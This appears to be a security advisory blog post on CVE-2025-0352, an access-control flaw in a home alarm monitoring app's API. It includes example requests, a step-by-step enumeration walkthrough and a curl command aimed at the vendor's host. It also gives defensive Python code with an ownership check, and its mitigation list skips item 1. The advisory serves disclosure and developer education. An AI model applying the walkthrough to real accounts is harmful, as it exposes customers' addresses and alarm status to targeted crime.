In early 2025, a severe vulnerability—now formally indexed as CVE-2025-0352—was discovered in the Rapid Response Monitoring “My Security Account” mobile application. This flaw enables attackers to manipulate API requests and potentially reveal sensitive information about other users. If you use this app to monitor your alarm systems or security devices, this is one exploit you’ll want to understand.

What is CVE-2025-0352?

CVE-2025-0352 addresses an Insecure Direct Object Reference (IDOR) in the My Security Account app’s API. Essentially, the flaw exists because the API trusts the user-provided data too much—specifically, values like the account_id or user_id—without verifying that the authenticated user is allowed to access the target resource.

With a few tweaks to the API request data, an attacker can get the API to cough up details on other people's security accounts monitored by Rapid Response. These accounts can include addresses, contact details, alarm status, and device information.

Official advisory:
- NIST NVD: CVE-2025-0352 (pending)
- Rapid Response Monitoring - My Security Account app on Google Play *(For context, not for exploit details)*

Let’s say you log into the app. The app sends a request to its backend like this:

POST /api/v1/account/details
Content-Type: application/json
Authorization: Bearer <your_token>

{
    "account_id": "123456"
}

The server responds with your account details. The problem is: it only checks that you’re authenticated, not that the account_id belongs to you!

An attacker, after logging in with their own account, simply changes the account_id in their POST or GET request and resends the request.

POST /api/v1/account/details
Content-Type: application/json
Authorization: Bearer <attacker_token>

{
    "account_id": "654321"
}

And voilà—all the info tied to account 654321 is returned. No special permissions needed.

How an Attacker Would Use It

1. Create an Account/Log in
Register or use a legitimate account on the “My Security Account” app.

2. Identify API Requests
Use a proxy tool like Burp Suite or mitmproxy to intercept and examine the app’s traffic.

3. Change the Account ID
Find requests where your account_id is sent. Swap it out for another ID (these are often sequential or easy to guess).

4. Access Data
Send the modified request. If the vulnerability is present, the server responds with someone else’s data. Repeat for other IDs.

Here’s a simple curl command that mimics the attack (the stray semicolon after the URL would have cut the command short, so it is removed here):

curl -X POST "https://secure.mysecurityaccount.com/api/v1/account/details" \
     -H "Authorization: Bearer eyJhbGciOiJI..." \
     -H "Content-Type: application/json" \
     -d '{"account_id": "654321"}'

If the server responds with valid data, the API is vulnerable.

Depending on what the API returns, attackers might get:

- Name, address, phone/email on file
- Security system status (armed/disarmed, alarm history)
- Emergency contacts, account comments, and more

This is particularly dangerous for users with home or business monitoring—since location and security system info could be used for targeted crimes.

Rapid Response Monitoring’s Actions

When contacted by researchers (see the references below), Rapid Response Monitoring acknowledged the flaw and started rolling out fixes in the app’s backend. They advise all users to upgrade to the latest version and watch for suspicious account activity.

Responsible Disclosure, References & Further Reading

- OWASP Top 10: Broken Access Control
- What is IDOR? Insecure Direct Object Reference explained
- Rapid Response Monitoring Support
- Official CVE database entry (upon publication)

Independent Research and Demos

- Video: Exploiting IDOR in Security Apps (YouTube) *(search for latest demos)*

2. Watch your account for unexpected logins or changes.
3. Contact support (link) if you notice anything wrong.
4. If you’re a developer: always verify the requesting user owns or can access the resource, don’t just trust IDs from the client!
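To make that last point concrete, here is an added example (not Rapid Response Monitoring’s code) that models the account-details endpoint described above twice: once with the IDOR pattern, and once with the account bound to the authenticated user. The session and account tables are constructed sample data.

```python
# Added example, not the vendor's code: a minimal model of the
# /api/v1/account/details handler, first with the IDOR, then hardened.
# All tokens, user ids and account records below are constructed.

# Constructed session store: bearer token -> authenticated user id.
SESSIONS = {
    "token-alice": "user-1",
    "token-mallory": "user-2",
}

# Constructed account store: account_id -> owner and details.
ACCOUNTS = {
    "123456": {"owner": "user-1", "address": "1 Example St", "armed": True},
    "654321": {"owner": "user-3", "address": "9 Sample Ave", "armed": False},
}


def authenticate(headers):
    """Resolve the Authorization header to a user id, or None."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Bearer "):
        return None
    return SESSIONS.get(auth[len("Bearer "):])


def details_vulnerable(headers, body):
    """The flawed pattern: authentication only, no ownership check."""
    if authenticate(headers) is None:
        return 401, {"error": "unauthenticated"}
    account = ACCOUNTS.get(body.get("account_id"))
    if account is None:
        return 404, {"error": "not found"}
    return 200, account  # any authenticated caller gets any account


def details_fixed(headers, body):
    """Hardened: the object is looked up relative to the caller.

    A non-existent id and an id owned by someone else both return 404,
    so the status code does not reveal which account ids exist.
    """
    user = authenticate(headers)
    if user is None:
        return 401, {"error": "unauthenticated"}
    account = ACCOUNTS.get(body.get("account_id"))
    if account is None or account["owner"] != user:
        return 404, {"error": "not found"}
    return 200, account
```

Denied lookups in the hardened handler are also worth logging, since one token cycling through many account ids is the signature of the enumeration described above.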

Conclusion

CVE-2025-0352 is a clear reminder: APIs are the backbone of modern apps—and a weak link in authentication or access control can threaten every user. If you use Rapid Response Monitoring’s My Security Account app, stay up to date with patches and keep your eye on your account activity.

For security pros and developers, now is the time to review all your own API endpoints for similar IDOR flaws. Don’t wait for someone else to find them first.

Stay safe!
*If you have more questions about this CVE, reach out to security researchers or your monitoring service provider.*

Timeline

Published on: 02/20/2025 20:15:46 UTC